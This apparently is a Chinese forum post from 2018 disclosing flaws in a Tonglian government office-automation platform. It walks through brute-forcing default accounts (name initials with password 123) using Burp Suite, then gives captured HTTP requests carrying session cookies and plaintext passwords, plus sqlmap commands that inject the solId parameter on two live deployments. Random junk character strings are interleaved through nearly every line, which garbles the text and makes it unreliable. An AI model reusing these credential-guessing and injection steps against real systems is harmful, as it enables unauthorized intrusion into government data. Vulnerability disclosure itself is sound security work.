|
( x$ v3 j, D( w( D/ X5 Q. s1 y
1 { F5 X7 G$ ]8 ^* s
. X; w- z% t3 F! k9 i; X* B! ?* `. m
平台简介:
3 Q/ S2 l1 ?: x3 Z
+ \4 r/ u' _) _% [
, ]$ t5 ~) r" L# ~1 r6 X ( U( R: }- L! }0 v( g
l7 S" m' P3 a. p3 C* {
3 f9 N3 H- i( G& }, j" r6 L 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
9 [: @% T( U! J( y2 ~( x# n6 p
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
, B& E& f5 ?/ n/ U" M) E/ b* \同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
4 D# e* g, f. a; _% C) }$ h" ] & T& x, y q9 }6 n
T; @8 ~( n# |/ X! T9 G
$ B5 C* g$ g0 C8 [9 M- I* R * C( D1 S/ Z% m
* t" N/ @6 Y9 [ t# M1 L
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:& B1 e6 n' p3 y. [( u
S, ?1 y- X( F9 E J- G
0 `- G k4 B" ` 0 Q' ]+ {& c6 G8 y2 t4 ~
# s: t8 P. d- f
7 ~5 ?. B* U$ q# d2 \
http://1.1.1.1:7197/cap-aco/#(案例2-)
- ^: I7 X9 N9 V& g$ |" I # v+ |0 i# T$ l5 `; k6 e2 _
- x) |1 G6 ^5 a http://www.XXOO.com (案例1-官网网站)
; }" s' J5 K- f9 D3 k8 ?( r* q
+ Y1 ^8 [ z# }# q5 l# m
3 V' l$ M6 E [% x7 Q ! T( L5 x0 K: A6 f% [( i
% {6 Y9 h4 F3 l! F9 d, \6 ]
* `7 w9 N( k% w, U( a0 E 漏洞详情:- F5 i+ v+ u4 |; {) `/ `- ^
) T2 P1 J: e9 C% V
$ M' j/ c; B' g' \2 E9 L
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
5 M$ |8 d4 W4 M0 {+ k# i$ M% ]8 ^
, s4 S0 h1 s( `5 j' v% V. x3 e/ \/ a3 e% G! Z4 {
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
) L* r7 c, g: r2 Y4 F0 M 4 m4 @. H' x" G- U9 U# z" R7 \
8 Y/ l& A) @2 |$ Y
: G) Y& l x2 p( w% x: @& |8 U/ t 9 G$ e: L) A6 f: u
& C! m6 v3 h2 L. K6 }) S t  0 ?! p1 q2 H+ c. ^- L5 w7 V
, p3 k/ n l; W& ^" Y
9 l L: L' v8 _. p" F% v
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
/ g6 L3 R& b: @+ M% p. e
8 Q6 Z" q4 m, w' ?, x
) R! \6 {: g! B: z. [ 1、案例1-官方网站
8 N3 f- u) U# w% a# L9 Y& G6 B 2 t8 W2 ?" k' ?6 {
/ L; B9 b, G3 A$ }4 b4 ~* c GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.11 Y" j9 T7 s& B. N0 c
0 P: B* \: H! t2 _& T- b) G- W$ u( R \/ J1 f6 Q
Host: www.XXOO.com& s' p( {; d# e% Y
% N, n2 l; \5 w0 y4 ~( ^, |
# z/ T, g6 Z" J: o4 X8 l0 A9 S$ e. H Proxy-Connection: Keep-Alive
, m* B; s* M$ t& N
6 b3 S' o6 H2 T- M6 ?2 B" j. y6 ?% D- X; I" f! c
Accept: application/json, text/javascript, */*; q=0.01 j& g( F" A: y; b3 H
3 c: A+ x3 d" @1 B% r
9 Y/ z+ Q) K2 H# F) m6 J& r Accept-Language: zh-CN
; I8 c" s3 e6 _* b/ r( [
. b! ]+ D8 X) T7 X' p0 s% F8 K$ I6 ?0 F
Content-Type: application/json4 _; ^/ o, J, }8 z- R" P7 u
2 [8 V& Q/ C9 p' [# T- P, y* W6 f
0 P, a( K% N0 v. L5 g/ S2 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
3 p+ P' i" Y% a) z( G9 k 5 v7 m& g+ u4 v6 \
& B0 q+ s$ W8 V- v2 f X-Requested-With: XMLHttpRequest
+ B4 }' M* A% u, t7 \( I, { 2 ~ Y3 X2 }- `" O
" _; {9 c7 c2 u9 H- i
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002# ]; o5 b% v" s1 n; g2 v& B3 E/ m
}4 U+ k& C5 H) a% X1 P) m! }' E$ R; N" T; O) o
Accept-Encoding: gzip, deflate, sdch
$ [" |, L5 A J+ h1 M
5 t0 d% ^* z+ L6 g/ V# w
8 }2 I. x& B& V4 R- P. L; r; D Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e) f3 P7 C( \+ Y( F+ I9 U2 m8 a/ E
3 m0 m, a5 |6 G( V6 `/ R- }& u2 q
- q4 T6 X8 Y' B9 n 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* r7 I9 O1 U$ \3 [% i" L4 a8 U
0 D9 ]: z( S# B1 F; C3 k5 \
2 T( ^3 \; o$ V9 q: {  * k. q1 h% N/ ~) p
2 M5 J* Q, t$ A
, C' [; Y/ O' Y4 e3 r& \7 w7 Z0 G 
% y8 k( x: Q) D3 Z* y/ ]( \
$ S' g* [+ K8 O" w7 t0 c* V9 B5 ?" J, W' S! h0 n. K, ]! j7 Z
' ]7 f/ h* J0 t+ t4 l. E" U
1 @& X' e1 y+ F
: v. ^$ ~! T: `: |9 U: P / |% t; u" \+ ^
& ]# \7 t+ u+ m# C0 V% V4 ^
& Z6 V4 H7 \9 D3 V% h; F) ?4 q5 D , X* Y8 @/ g* y5 A7 ^
, `: f# p4 q# r( z
! x9 B5 i1 S ?8 g+ N 2、案例2-某天河云平台
, G. r* Y( {7 A$ Q5 Q* U# X
, ?! W8 `. E+ [$ |0 ~' C- [# n, c' Q8 g! e0 w
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
: ^ t+ T* y: |' \ 8 b; o8 ^# \/ o4 v) z6 j
7 p) v4 d/ a# b/ Z Host: 1.1.1.:7197 q) K% j6 E' X$ y" H% @
8 y( H* \9 u; L* r; k
[7 g/ L( \- e4 L" m0 _' v Accept: application/json, text/javascript, */*; q=0.01* a* F; w, U, i
1 |4 }; L$ _! ~/ C% a3 o' X
8 F! x) B( e( j X-Requested-With: XMLHttpRequest
, \. c: l; v' e: I& S! e7 x: X
3 |# w1 |+ [' Q0 H/ j, w; V o
+ q: D3 x5 n1 I1 K# l* ~% }% T User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.09 F3 x2 {3 \9 Q3 M- P" `5 j
" }& g6 O5 p# O
; P1 x9 R% I- G Content-Type: application/json8 o/ x! L* r1 h, {5 p/ A
% B: _: f$ ], S" T3 a s
7 J3 r" S8 e8 D* l. A# G7 J) f$ F8 K1 @ Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
) y8 r7 q; K& N
. f& F* q0 k T* t
+ i# j3 j5 q8 v$ y5 P. D- R( f Accept-Language: zh-CN,zh;q=0.8+ a! a. W" ~3 I; y0 L( n2 {, e
4 n- f6 d2 y; `9 n8 |. R' K0 H& E0 d( b7 a$ k
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
1 }* r/ H3 ~" r! B! B, H. I
; D% P, z8 ^; N: c
5 L M4 }( }! [ X. q# B Connection: close
$ e. \+ n* h1 D4 H" ? ! j9 o3 v. u0 @7 C+ l# D7 {- A
$ e. @9 R$ v$ E4 l
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
7 S; ^& z" u' R& x% _3 E
( z+ u* `5 A, i# i$ I: i% _
5 i, h- X% {- Y/ L  # j3 U$ L/ Z. V9 a/ |% ^2 q2 j" Y/ W
4 C0 ~7 e$ l1 U! @! Y$ _
5 ^6 m6 ~ H8 }& w$ @2 l, m
; h% W/ |4 K1 Q
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对